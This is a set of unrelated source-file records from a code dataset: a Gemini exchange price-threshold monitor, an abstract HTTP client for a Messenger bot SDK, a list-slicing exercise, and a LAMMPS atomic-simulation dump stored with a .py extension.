be1bf8bedb3397c20eaccb3b6536f27ed3bc8b82 | aab904ff48ee50db955ec844e5663a64404a1042 | /gemini.py | 8d0795d7c7c3de2e37d8d6b183f5eaf3dfa8072f | []
| no_license | walazdev/GeminiChallenge | b5bd82aefe2768b949589793a5c526e3e78893d5 | 459d38385c84697f188893b8d5f8e07cec29b4d2 | refs/heads/main | 2023-04-01T17:19:21.405599 | 2021-03-22T17:37:19 | 2021-03-22T17:37:19 | 350,207,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,733 | py | import requests, json, sys, time, datetime
def main():
    """Poll all Gemini tickers forever and flag 24h price moves past a threshold.

    The threshold (in percent) is taken from the single command-line argument.
    Runs until interrupted; prints an "ERROR ... PRICE CHANGE" line whenever
    |24h change| exceeds the threshold.
    """
    # BUG FIX: validate the argument count *before* indexing sys.argv[1].
    # The original read sys.argv[1] first, so a missing argument raised
    # IndexError instead of printing the usage message.
    if (len(sys.argv) != 2):
        print("Usage: python3 gemini.py [% threshold]")
        sys.exit(1)
    userInput = sys.argv[1]
    try:
        userInputFloat = float(userInput)
    except ValueError:
        print("Usage: python3 gemini.py [% threshold]")
        print("[% threshold] has to be a number")
        sys.exit(1)
    print("User % change threshold:", sys.argv[1])
    # get tickers and sort by alphabetical order
    print(datetime.datetime.now(), "- INFO: Retrieving tickers")
    ticker_url = "https://api.gemini.com/v1/symbols"
    response = requests.get(ticker_url)
    tickers = sorted(response.json())
    while True:
        for i in range (0, len(tickers)):
            # Get general information about a specific ticker.
            # Fields used: 'open' (price 24h ago) and 'ask' (current best offer).
            timestamp = datetime.datetime.now()
            specificTicker = tickers[i]
            tickerURL = "https://api.gemini.com/v2/ticker/" + specificTicker
            tickerInfo = requests.get(tickerURL).json()
            # Some newly listed tickers return no data for certain keys;
            # skip them so float() below does not blow up on None.
            if tickerInfo['ask'] == None:
                continue
            print(timestamp, "- INFO: Fetched", specificTicker, "information")
            # uncomment line below to adhere to API rate limits
            # time.sleep(1.0)
            # Retrieve and compute price information
            openPrice = float(tickerInfo['open'])
            currentPrice = float(tickerInfo['ask'])
            percentPriceChange = get24hrPriceChange(currentPrice, openPrice)
            # Price change threshold exceeded (in either direction)
            if abs(percentPriceChange) > userInputFloat:
                print(timestamp, "- ERROR:", specificTicker, "***** PRICE CHANGE *****")
            else:
                print(timestamp, "- INFO:", specificTicker, "has not exceeded threshold")
            # Always print the summary line for the ticker
            print(timestamp, "|", specificTicker, "| Current price:", currentPrice, "| Open price:", openPrice, "| % change:", round(percentPriceChange, 2))
def get24hrPriceChange(finalPrice, startPrice):
    """Return the percent change from startPrice to finalPrice."""
    delta = finalPrice - startPrice
    return (delta / startPrice) * 100
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
25e2f3a9ceb559034509a531ca8eec0c56c15cdc | 9fcf684509bf39dbd7fcf7999e847b88ffb27a44 | /facebookbot/http_client.py | 6ec1347131f9b4cf5b5e5e61f03e3e3dc1b1d139 | [
"Apache-2.0"
]
| permissive | tailin/python-messengerbot-sdk | 916dd36279828ea76d21a5c90e26cf93c8ef1934 | cbe04b1a6b94b7cd7c04d06348737c041643b242 | refs/heads/master | 2020-04-27T11:31:09.368708 | 2019-03-07T07:00:25 | 2019-03-07T07:00:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,280 | py | from __future__ import unicode_literals
from abc import ABCMeta, abstractmethod, abstractproperty
import requests
from future.utils import with_metaclass
class HttpClient(with_metaclass(ABCMeta)):
"""Abstract Base Classes of HttpClient."""
DEFAULT_TIMEOUT = 5
def __init__(self, timeout=DEFAULT_TIMEOUT):
"""__init__ method.
:param timeout: (optional) How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`DEFAULT_TIMEOUT`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
self.timeout = timeout
@abstractmethod
def get(self, url, headers=None, params=None, stream=False, timeout=None):
"""GET request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param dict params: (optional) Request query parameter
:param bool stream: (optional) get content as stream
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
raise NotImplementedError
@abstractmethod
def post(self, url, headers=None, params=None, data=None, timeout=None):
"""POST request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
raise NotImplementedError
@abstractmethod
def delete(self, url, headers=None, data=None, timeout=None):
"""DELETE request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
raise NotImplementedError
class RequestsHttpClient(HttpClient):
"""HttpClient implemented by requests."""
def __init__(self, timeout=HttpClient.DEFAULT_TIMEOUT):
"""__init__ method.
:param timeout: (optional) How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`DEFAULT_TIMEOUT`
:type timeout: float | tuple(float, float)
"""
super(RequestsHttpClient, self).__init__(timeout)
def get(self, url, headers=None, params=None, stream=False, timeout=None):
"""GET request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param dict params: (optional) Request query parameter
:param bool stream: (optional) get content as stream
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: :py:class:`RequestsHttpResponse`
:return: RequestsHttpResponse instance
"""
if timeout is None:
timeout = self.timeout
response = requests.get(
url, headers=headers, params=params, stream=stream, timeout=timeout
)
return RequestsHttpResponse(response)
def post(self, url, headers=None, params=None, data=None, timeout=None):
"""POST request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: :py:class:`RequestsHttpResponse`
:return: RequestsHttpResponse instance
"""
if timeout is None:
timeout = self.timeout
response = requests.post(
url, headers=headers, params=params, data=data, timeout=timeout
)
return RequestsHttpResponse(response)
def delete(self, url, headers=None, data=None, timeout=None):
"""DELETE request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: :py:class:`RequestsHttpResponse`
:return: RequestsHttpResponse instance
"""
if timeout is None:
timeout = self.timeout
response = requests.delete(
url, headers=headers, data=data, timeout=timeout
)
return RequestsHttpResponse(response)
class HttpResponse(with_metaclass(ABCMeta)):
"""HttpResponse."""
@abstractproperty
def status_code(self):
"""Get status code."""
raise NotImplementedError
@abstractproperty
def headers(self):
"""Get headers."""
raise NotImplementedError
@abstractproperty
def text(self):
"""Get request body as text-decoded."""
raise NotImplementedError
@abstractproperty
def content(self):
"""Get request body as binary."""
raise NotImplementedError
@abstractproperty
def json(self):
"""Get request body as json-decoded."""
raise NotImplementedError
@abstractmethod
def iter_content(self, chunk_size=1024, decode_unicode=False):
"""Get request body as iterator content (stream).
:param int chunk_size:
:param bool decode_unicode:
"""
raise NotImplementedError
class RequestsHttpResponse(HttpResponse):
"""HttpResponse implemented by requests lib's response."""
def __init__(self, response):
"""__init__ method.
:param response: requests lib's response
"""
self.response = response
@property
def status_code(self):
"""Get status code."""
return self.response.status_code
@property
def headers(self):
"""Get headers."""
return self.response.headers
@property
def text(self):
"""Get request body as text-decoded."""
return self.response.text
@property
def content(self):
"""Get request body as binary."""
return self.response.content
@property
def json(self):
"""Get request body as json-decoded."""
return self.response.json()
def iter_content(self, chunk_size=1024, decode_unicode=False):
"""Get request body as iterator content (stream).
:param int chunk_size:
:param bool decode_unicode:
"""
return self.response.iter_content(chunk_size=chunk_size, decode_unicode=decode_unicode) | [
"[email protected]"
]
| |
825006c894ca28563ceb49ebb22caa4eb6aead20 | 4e0c1615c467c63524db9a33d0e769f1370f5a12 | /python-ops/training/exercise/test/murthy/r30.py | ae1cc0288d7548781efef0cae97dc498836eb388 | []
| no_license | infra-ops/cloud-ops | 1afb44ed29000491aaa5420ebc6e0b8d740fc55c | 4f676fde13f33c838f7f17affd705966a6d31da2 | refs/heads/master | 2023-08-27T03:00:32.867645 | 2023-08-23T14:27:59 | 2023-08-23T14:27:59 | 140,283,053 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 64 | py | values = [100,200,300,400]
slice = values[1:3]
print(slice)
| [
"[email protected]"
]
| |
4968c79739666e8ad2edd13f77a4d5034eea9c2e | 649bd422025e421d86025743eac324c9b882a2e8 | /exam/1_three-dimensional_atomic_system/dump/phasetrans/temp45_9000.py | 4d4f26e616aa9b6ced1b2bb6742aa541c91b1e07 | []
| no_license | scheuclu/atom_class | 36ddee1f6a5995872e858add151c5942c109847c | 0c9a8c63d9b38898c1869fe8983126cef17662cd | refs/heads/master | 2021-01-21T10:52:28.448221 | 2017-03-07T23:04:41 | 2017-03-07T23:04:41 | 83,489,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68,965 | py | ITEM: TIMESTEP
9000
ITEM: NUMBER OF ATOMS
2048
ITEM: BOX BOUNDS pp pp pp
7.1778912625688207e-01 4.6482210873740115e+01
7.1778912625688207e-01 4.6482210873740115e+01
7.1778912625688207e-01 4.6482210873740115e+01
ITEM: ATOMS id type xs ys zs
8 1 0.128064 0.0616737 0.0601487
35 1 0.0656057 0.120012 0.0619676
130 1 0.0685266 0.0608412 0.125938
165 1 0.131318 0.120832 0.125956
1268 1 0.497119 0.93268 0.182308
1361 1 0.496588 0.750478 0.240454
133 1 0.126633 1.00601 0.124891
1460 1 0.500803 0.688928 0.435722
12 1 0.250297 0.0562202 0.0614448
39 1 0.192212 0.12316 0.0614049
43 1 0.310904 0.126252 0.0601463
134 1 0.189034 0.058369 0.123643
138 1 0.309645 0.0635839 0.120587
169 1 0.251645 0.126535 0.118547
137 1 0.247687 0.998671 0.125268
1505 1 -0.00176351 0.879562 0.375917
1090 1 0.0589042 0.812625 -0.00200376
16 1 0.373189 0.060716 0.0622224
47 1 0.438316 0.126239 0.0610428
142 1 0.437451 0.0601493 0.122661
173 1 0.378996 0.12285 0.11939
141 1 0.372617 1.00299 0.12081
15 1 0.439286 0.00251552 0.0601038
1124 1 0.000200366 0.942055 0.0542765
40 1 0.123702 0.18568 0.0616187
67 1 0.0646421 0.253388 0.0630245
72 1 0.12164 0.314239 0.0652134
162 1 0.0610812 0.179524 0.12545
194 1 0.0576994 0.309699 0.127795
197 1 0.123288 0.249691 0.120972
1641 1 0.243923 0.878471 0.504706
353 1 -4.25247e-05 0.36814 0.246475
42 1 0.312772 0.188421 -0.000934665
44 1 0.251675 0.196724 0.0615479
71 1 0.188218 0.252487 0.0601214
75 1 0.317639 0.248913 0.0683485
76 1 0.249202 0.315718 0.0597648
166 1 0.186483 0.190151 0.118945
170 1 0.318594 0.185733 0.127466
198 1 0.185731 0.312591 0.120281
201 1 0.248152 0.254854 0.127487
202 1 0.31761 0.313972 0.119253
340 1 0.49425 0.316618 0.314526
48 1 0.378232 0.186003 0.0651367
79 1 0.438053 0.251286 0.0629577
80 1 0.37839 0.312127 0.0577043
174 1 0.440193 0.18599 0.127182
205 1 0.380049 0.250952 0.125125
206 1 0.437785 0.319056 0.121805
1473 1 0.00366176 0.754869 0.374141
1169 1 0.501797 0.496945 0.123152
99 1 0.0652059 0.377204 0.0671047
104 1 0.130785 0.437832 0.0599418
226 1 0.0653255 0.431762 0.124595
229 1 0.130258 0.376473 0.121647
1157 1 0.125964 0.494957 0.124186
1645 1 0.372234 0.871195 0.501377
1281 1 -0.00107149 0.500479 0.250666
180 1 0.503362 0.186886 0.188477
103 1 0.186807 0.373728 0.0608981
107 1 0.317603 0.377198 0.0633315
108 1 0.252165 0.438418 0.061388
230 1 0.188993 0.439229 0.120675
233 1 0.247896 0.378781 0.126012
234 1 0.312021 0.441367 0.124453
1035 1 0.312601 0.505172 0.0603768
1236 1 0.495387 0.816815 0.186807
77 1 0.376869 0.246907 -0.0038311
111 1 0.439765 0.373956 0.0617845
112 1 0.378935 0.440822 0.0633536
237 1 0.376515 0.378723 0.125523
238 1 0.439402 0.436295 0.128258
1165 1 0.374516 0.498781 0.128345
10 1 0.313335 0.0635035 0.00239691
1518 1 0.436539 0.939934 0.372265
404 1 0.495014 0.0614877 0.441303
1027 1 0.0615267 0.494489 0.0656524
1032 1 0.122919 0.560398 0.0604642
1059 1 0.0600784 0.625129 0.0666329
1154 1 0.0623433 0.560911 0.129236
1189 1 0.125564 0.623536 0.126188
1517 1 0.373563 0.872828 0.38073
526 1 0.434098 0.0635261 0.499805
45 1 0.376622 0.127572 -0.00151715
1161 1 0.252976 0.505641 0.124012
1031 1 0.189052 0.500772 0.060167
1036 1 0.247119 0.565256 0.0624889
1063 1 0.186865 0.62311 0.0601622
1067 1 0.314961 0.628527 0.0609443
1158 1 0.183851 0.55771 0.121548
1162 1 0.315458 0.566389 0.12391
1193 1 0.24685 0.618006 0.126501
73 1 0.255723 0.254866 0.00159523
276 1 0.498132 0.0616439 0.312336
292 1 -0.000855735 0.18199 0.313154
1039 1 0.440855 0.498033 0.0604513
1040 1 0.377536 0.565027 0.0617404
1071 1 0.435508 0.62586 0.0629231
1166 1 0.434639 0.560493 0.127884
1197 1 0.373824 0.627258 0.126695
1064 1 0.12404 0.684612 0.0676066
1091 1 0.0625377 0.750335 0.0570339
1096 1 0.124176 0.812646 0.0626356
1186 1 0.0654683 0.685662 0.133279
1218 1 0.0631242 0.812612 0.128775
1221 1 0.119685 0.749536 0.126446
1538 1 0.0579054 0.562888 0.500989
1519 1 0.438729 0.881673 0.43737
1058 1 0.0632657 0.683946 -0.00315472
401 1 0.496951 1.00103 0.375212
1068 1 0.248596 0.682303 0.0628255
1095 1 0.187501 0.744823 0.0615051
1099 1 0.311162 0.748619 0.0570169
1100 1 0.251631 0.812802 0.0618844
1190 1 0.185829 0.686611 0.12615
1194 1 0.313421 0.683137 0.125319
1222 1 0.186526 0.81082 0.120182
1225 1 0.25031 0.751117 0.123451
1226 1 0.3149 0.811161 0.119609
1072 1 0.373794 0.686397 0.0575702
1103 1 0.441103 0.74609 0.0642725
1104 1 0.381761 0.808032 0.0629057
1198 1 0.438451 0.683202 0.123451
1229 1 0.37382 0.743217 0.120781
1230 1 0.433988 0.812488 0.123951
1396 1 0.495325 0.940886 0.309992
1476 1 0.00279954 0.815318 0.443657
4 1 0.00268231 0.0581827 0.0581558
1093 1 0.126199 0.745718 0.00234561
497 1 0.499164 0.378573 0.375227
522 1 0.312447 0.0605191 0.497947
1520 1 0.371576 0.93517 0.437435
3 1 0.0674949 0.994957 0.0630218
1123 1 0.059326 0.877502 0.0597483
1128 1 0.127883 0.931594 0.0623519
1250 1 0.0612731 0.937854 0.126495
1253 1 0.126191 0.876586 0.126658
1156 1 -0.000827386 0.558044 0.189483
589 1 0.370624 0.25181 0.503365
129 1 -0.00192829 1.00219 0.127046
148 1 0.502587 0.0619035 0.182207
7 1 0.184516 0.00143089 0.0600096
11 1 0.31236 0.99826 0.0663178
1127 1 0.186899 0.874887 0.0576461
1131 1 0.312698 0.878384 0.0579517
1132 1 0.248208 0.933403 0.0584845
1254 1 0.188238 0.93732 0.123193
1257 1 0.246739 0.874119 0.123142
1258 1 0.311784 0.936281 0.126723
132 1 -0.00453866 0.060552 0.186355
1135 1 0.435933 0.875127 0.0621282
1136 1 0.374582 0.937844 0.0647127
1261 1 0.379724 0.87299 0.120824
1262 1 0.433606 0.936288 0.122994
1297 1 0.498803 0.504573 0.251608
391 1 0.187404 0.999118 0.431824
557 1 0.37392 0.118721 0.498954
1153 1 0.00459273 0.494908 0.129415
136 1 0.126202 0.0553161 0.18993
163 1 0.063299 0.118718 0.187807
258 1 0.0611069 0.0584147 0.248711
264 1 0.124113 0.0614263 0.311048
291 1 0.062736 0.121139 0.31029
293 1 0.120955 0.120757 0.24694
395 1 0.31049 0.996986 0.43848
140 1 0.253893 0.0587744 0.186075
167 1 0.190556 0.121815 0.184051
171 1 0.312374 0.12346 0.188044
262 1 0.185705 0.0606897 0.243929
266 1 0.318322 0.0643545 0.246972
268 1 0.254636 0.0607924 0.303566
295 1 0.188235 0.120335 0.310605
297 1 0.244366 0.126288 0.245577
299 1 0.307617 0.125499 0.305123
267 1 0.309122 1.00017 0.313908
139 1 0.314734 0.991987 0.190697
263 1 0.185965 0.00462774 0.30789
1514 1 0.316488 0.935734 0.374018
144 1 0.370596 0.0619032 0.18186
175 1 0.441004 0.121214 0.183745
270 1 0.43291 0.0621934 0.246724
272 1 0.376497 0.0602291 0.312762
301 1 0.375449 0.130513 0.251919
303 1 0.438854 0.131573 0.312911
269 1 0.374654 -0.00598033 0.252123
143 1 0.437153 0.997103 0.182541
271 1 0.436365 -0.000629748 0.30798
1510 1 0.182019 0.943842 0.372819
617 1 0.250249 0.372187 0.497785
168 1 0.122791 0.187429 0.183995
195 1 0.0644383 0.248276 0.185065
200 1 0.122152 0.310914 0.1798
290 1 0.0639428 0.185573 0.250313
296 1 0.126817 0.17894 0.306485
322 1 0.0559255 0.305244 0.245609
323 1 0.0654555 0.245803 0.306491
325 1 0.127957 0.249944 0.246626
328 1 0.116928 0.309366 0.308294
172 1 0.2443 0.185926 0.182907
199 1 0.183147 0.251222 0.183258
203 1 0.312839 0.255755 0.183768
204 1 0.25383 0.318898 0.186369
294 1 0.185169 0.186456 0.242955
298 1 0.315348 0.194168 0.246951
300 1 0.246326 0.189627 0.307702
326 1 0.183193 0.316005 0.244495
327 1 0.1863 0.247557 0.312364
329 1 0.244554 0.251722 0.241651
330 1 0.313695 0.316519 0.247436
331 1 0.309809 0.253944 0.304844
332 1 0.246241 0.313833 0.307104
176 1 0.380015 0.190715 0.189758
207 1 0.437748 0.257997 0.187061
208 1 0.371477 0.317926 0.184364
302 1 0.437641 0.188309 0.24775
304 1 0.376547 0.193029 0.314082
333 1 0.377482 0.252986 0.249123
334 1 0.439004 0.317249 0.25003
335 1 0.437498 0.252285 0.315218
336 1 0.372407 0.317601 0.307845
1516 1 0.248167 0.936888 0.429475
1511 1 0.185505 0.882182 0.435153
1515 1 0.308149 0.873553 0.444158
1513 1 0.247877 0.874089 0.374604
227 1 0.0625331 0.369948 0.189446
232 1 0.121308 0.433538 0.188408
354 1 0.0612573 0.43898 0.247824
355 1 0.057687 0.37272 0.315501
357 1 0.121019 0.372975 0.250506
360 1 0.129054 0.43409 0.310108
1285 1 0.123928 0.499269 0.254047
585 1 0.252917 0.25314 0.499642
231 1 0.183807 0.370497 0.182229
235 1 0.309773 0.378042 0.183419
236 1 0.251048 0.444848 0.185051
358 1 0.186144 0.428092 0.24612
359 1 0.185041 0.372116 0.315725
361 1 0.251042 0.378036 0.24217
362 1 0.308691 0.43621 0.248735
363 1 0.311324 0.377282 0.305445
364 1 0.250553 0.434796 0.309524
1163 1 0.31277 0.506061 0.193779
1289 1 0.246192 0.497117 0.251662
1291 1 0.307341 0.502717 0.305753
17 1 0.503331 1.00092 -5.03253e-05
239 1 0.440343 0.374374 0.18613
240 1 0.376163 0.439988 0.186013
365 1 0.36885 0.378075 0.24027
366 1 0.434448 0.436328 0.247742
367 1 0.432639 0.375712 0.308075
368 1 0.373493 0.438174 0.306483
1167 1 0.436377 0.50294 0.186794
1295 1 0.434196 0.501743 0.316836
1293 1 0.378371 0.506905 0.253384
513 1 -0.00189259 0.00212709 0.500858
100 1 0.00119801 0.433537 0.0591184
9 1 0.256534 -0.00239472 -0.000735999
1283 1 0.0554452 0.499757 0.314319
1155 1 0.0640344 0.496992 0.188687
1160 1 0.120713 0.561963 0.189574
1187 1 0.0555345 0.624932 0.193093
1282 1 0.0617456 0.562975 0.252934
1288 1 0.121432 0.561162 0.31374
1315 1 0.0621049 0.631199 0.307189
1317 1 0.122939 0.62413 0.252207
1482 1 0.313295 0.812849 0.381979
1287 1 0.187668 0.494741 0.312467
1159 1 0.184026 0.49741 0.193531
1164 1 0.246418 0.561055 0.18888
1191 1 0.183611 0.625925 0.189048
1195 1 0.31032 0.627134 0.187905
1286 1 0.18642 0.561543 0.251511
1290 1 0.31083 0.565743 0.251574
1292 1 0.242998 0.561689 0.306627
1319 1 0.183334 0.621946 0.314476
1321 1 0.24408 0.625062 0.248175
1323 1 0.305154 0.622023 0.312297
389 1 0.119706 0.00123357 0.373769
1168 1 0.372108 0.562352 0.18918
1199 1 0.435448 0.627945 0.185547
1294 1 0.437751 0.569058 0.250806
1296 1 0.375338 0.570543 0.31563
1325 1 0.37646 0.626183 0.249524
1327 1 0.439703 0.625323 0.312478
578 1 0.0636694 0.313191 0.496664
1506 1 0.0637973 0.938676 0.371425
1512 1 0.121737 0.941106 0.440084
1509 1 0.127189 0.878438 0.372776
1192 1 0.123046 0.688033 0.187845
1219 1 0.0613539 0.752188 0.190863
1224 1 0.127652 0.812703 0.186383
1314 1 0.0591187 0.693024 0.251135
1320 1 0.125504 0.687539 0.315291
1346 1 0.0624753 0.814741 0.251216
1347 1 0.0631136 0.753759 0.315603
1349 1 0.12229 0.751867 0.25143
1352 1 0.126677 0.81769 0.310533
1196 1 0.24688 0.688359 0.18463
1223 1 0.182295 0.752967 0.181997
1227 1 0.30992 0.748346 0.186609
1228 1 0.248295 0.816616 0.184981
1318 1 0.183483 0.685925 0.246744
1322 1 0.311265 0.683378 0.251826
1324 1 0.250927 0.687423 0.312015
1350 1 0.186261 0.81377 0.242094
1351 1 0.185594 0.753797 0.309324
1353 1 0.245452 0.752787 0.248648
1354 1 0.309983 0.810458 0.251481
1355 1 0.309267 0.750401 0.31391
1356 1 0.250346 0.812691 0.312997
1200 1 0.371615 0.686802 0.189665
1231 1 0.438037 0.745254 0.184269
1232 1 0.372234 0.808338 0.186221
1326 1 0.439108 0.686839 0.248975
1328 1 0.37254 0.685192 0.312443
1357 1 0.374662 0.74914 0.252853
1358 1 0.436601 0.816136 0.252206
1359 1 0.434355 0.752433 0.307619
1360 1 0.37066 0.815408 0.311074
1507 1 0.0585493 0.884574 0.436326
261 1 0.126547 0.998641 0.249606
259 1 0.0594185 1.0002 0.312242
131 1 0.0649599 -0.000253709 0.189757
1251 1 0.0668458 0.875254 0.187111
1256 1 0.125963 0.937016 0.183067
1378 1 0.0623391 0.939438 0.249718
1379 1 0.0599284 0.876582 0.313747
1381 1 0.126176 0.8777 0.251222
1384 1 0.128308 0.938884 0.309896
1581 1 0.374494 0.624682 0.501411
1479 1 0.18626 0.751787 0.439931
135 1 0.189054 0.997703 0.189372
265 1 0.251625 0.998369 0.248092
1255 1 0.187301 0.87938 0.18865
1259 1 0.316432 0.873808 0.187525
1260 1 0.251329 0.938428 0.186274
1382 1 0.187403 0.935852 0.250142
1383 1 0.188878 0.879769 0.312023
1385 1 0.250392 0.873387 0.249988
1386 1 0.31777 0.937031 0.254483
1387 1 0.307981 0.877218 0.315473
1388 1 0.246757 0.943671 0.315454
1450 1 0.312723 0.682158 0.376817
1452 1 0.253781 0.683369 0.436627
1263 1 0.433699 0.873106 0.188809
1264 1 0.374185 0.938183 0.185338
1389 1 0.371537 0.871141 0.247088
1390 1 0.436308 0.939597 0.249144
1391 1 0.434023 0.874305 0.311302
1392 1 0.375665 0.933085 0.310433
387 1 0.0616342 -0.00413245 0.436958
386 1 0.061482 0.0645407 0.377282
392 1 0.125507 0.062929 0.433097
419 1 0.0623716 0.124048 0.440118
421 1 0.121817 0.123526 0.375256
1446 1 0.187947 0.694219 0.378533
49 1 0.503626 0.122465 -0.00107789
393 1 0.253311 0.00025499 0.375897
390 1 0.187879 0.0606267 0.372048
394 1 0.308753 0.0645111 0.371937
396 1 0.24491 0.0633844 0.431491
423 1 0.184229 0.128727 0.43889
425 1 0.247658 0.128347 0.370059
427 1 0.309858 0.124829 0.428876
1249 1 0.00151478 0.877134 0.125833
1345 1 -0.00295084 0.756632 0.25095
397 1 0.372053 0.996971 0.368989
1481 1 0.255394 0.752909 0.378186
399 1 0.433472 0.998522 0.431204
398 1 0.437591 0.0632107 0.374811
400 1 0.372645 0.0628344 0.433534
429 1 0.377469 0.123785 0.368173
431 1 0.438543 0.122898 0.436122
484 1 0.00409659 0.440692 0.436626
1441 1 -0.0068194 0.627821 0.372784
1265 1 0.494599 0.874101 0.122291
1442 1 0.0664961 0.688396 0.376874
1480 1 0.123934 0.81997 0.440747
418 1 0.0637774 0.180642 0.375111
424 1 0.123416 0.188513 0.440106
450 1 0.0544253 0.305643 0.370747
451 1 0.0601029 0.24719 0.438875
453 1 0.123568 0.242505 0.375501
456 1 0.126368 0.308182 0.43273
1425 1 0.497515 0.501303 0.373066
422 1 0.187695 0.184892 0.37189
426 1 0.314613 0.189756 0.368818
428 1 0.251995 0.191165 0.437135
454 1 0.190124 0.311263 0.378359
455 1 0.192624 0.250081 0.437269
457 1 0.253342 0.248993 0.372108
458 1 0.306355 0.310842 0.365423
459 1 0.316976 0.254395 0.433986
460 1 0.250403 0.313012 0.436974
385 1 0.000979362 0.00155035 0.380446
625 1 0.503331 0.38075 0.493764
1457 1 0.500379 0.6232 0.376257
1486 1 0.441174 0.811765 0.372593
430 1 0.436814 0.190487 0.375901
432 1 0.369854 0.185121 0.436502
461 1 0.379987 0.252477 0.373166
462 1 0.435111 0.314155 0.37515
463 1 0.435808 0.248453 0.438508
464 1 0.372998 0.322606 0.430709
1485 1 0.370153 0.750663 0.376384
613 1 0.122453 0.370397 0.499864
1487 1 0.436175 0.751309 0.436427
483 1 0.0670427 0.374222 0.431024
488 1 0.124863 0.44224 0.439126
485 1 0.127392 0.372986 0.373951
482 1 0.0674446 0.440693 0.373924
1411 1 0.064305 0.508125 0.439929
1456 1 0.378168 0.684986 0.436154
492 1 0.25016 0.439669 0.439326
490 1 0.312402 0.438412 0.369941
489 1 0.251863 0.376475 0.372708
491 1 0.307602 0.378521 0.430293
486 1 0.189511 0.437104 0.37443
487 1 0.187667 0.374361 0.437045
1415 1 0.188102 0.497499 0.435269
13 1 0.374241 -0.00255023 -0.000359928
1454 1 0.435673 0.690608 0.368103
494 1 0.436172 0.433352 0.375688
496 1 0.366255 0.438591 0.440752
493 1 0.370309 0.378001 0.365833
495 1 0.438949 0.373918 0.440165
1423 1 0.43322 0.498099 0.438377
1421 1 0.37631 0.500472 0.379461
1448 1 0.124443 0.69231 0.439071
388 1 -0.00533016 0.0629443 0.435993
1488 1 0.380978 0.814464 0.438349
1541 1 0.126678 0.502835 0.500573
1478 1 0.190813 0.808273 0.370274
1413 1 0.123012 0.502973 0.371588
1410 1 0.0607055 0.562531 0.37427
1416 1 0.126555 0.564325 0.440526
1443 1 0.0551028 0.628838 0.434272
1445 1 0.124618 0.628114 0.379744
1417 1 0.244448 0.497896 0.377885
1419 1 0.308974 0.500663 0.437795
1420 1 0.252069 0.559832 0.436869
1451 1 0.312574 0.618023 0.437868
1449 1 0.247743 0.620668 0.369153
1447 1 0.188116 0.626933 0.434837
1414 1 0.18501 0.561148 0.374979
1418 1 0.312203 0.560582 0.375451
1474 1 0.0650418 0.810559 0.375563
1329 1 0.50307 0.626445 0.249104
1484 1 0.240829 0.818129 0.439789
1453 1 0.372352 0.62291 0.378206
1424 1 0.376493 0.558007 0.439394
1455 1 0.43975 0.622962 0.443268
1422 1 0.438703 0.564425 0.373907
1475 1 0.0625113 0.752007 0.436975
1483 1 0.313634 0.751432 0.440339
1477 1 0.12918 0.754293 0.375045
1428 1 0.501697 0.563966 0.439711
1377 1 0.00204575 0.88003 0.253538
581 1 0.124903 0.250088 0.500275
1508 1 -0.00273591 0.939249 0.439701
46 1 0.441079 0.191083 0.0010372
161 1 0.000474957 0.121225 0.123844
97 1 -0.000383631 0.375334 -0.00143242
1140 1 0.498168 0.936939 0.0639151
1348 1 0.000430207 0.820489 0.314469
554 1 0.308173 0.187619 0.503906
590 1 0.434946 0.315694 0.50067
1060 1 0.000283365 0.687329 0.0698193
558 1 0.434819 0.18843 0.498072
1613 1 0.375005 0.747603 0.49975
372 1 0.501764 0.436281 0.31196
481 1 -0.00368022 0.377331 0.376243
1252 1 -0.0027364 0.941933 0.190192
433 1 0.497631 0.128759 0.37169
244 1 0.493577 0.43504 0.191685
1057 1 0.00204069 0.620631 0.00297113
1130 1 0.315573 0.937904 -0.00502408
1649 1 0.498916 0.874683 0.501422
228 1 -0.00200904 0.434553 0.186008
1028 1 0.00315237 0.558347 0.0668672
1393 1 0.500582 0.879586 0.253306
1092 1 -0.00146861 0.81369 0.066918
1605 1 0.123715 0.753241 0.499682
621 1 0.373023 0.378521 0.499891
1606 1 0.182793 0.817679 0.503344
582 1 0.184832 0.310355 0.497341
1129 1 0.250855 0.876582 -0.00081003
622 1 0.436628 0.435307 0.494339
1570 1 0.0557331 0.687147 0.496177
525 1 0.375579 0.000476324 0.49662
1573 1 0.126049 0.62329 0.498433
106 1 0.318575 0.432571 0.00458534
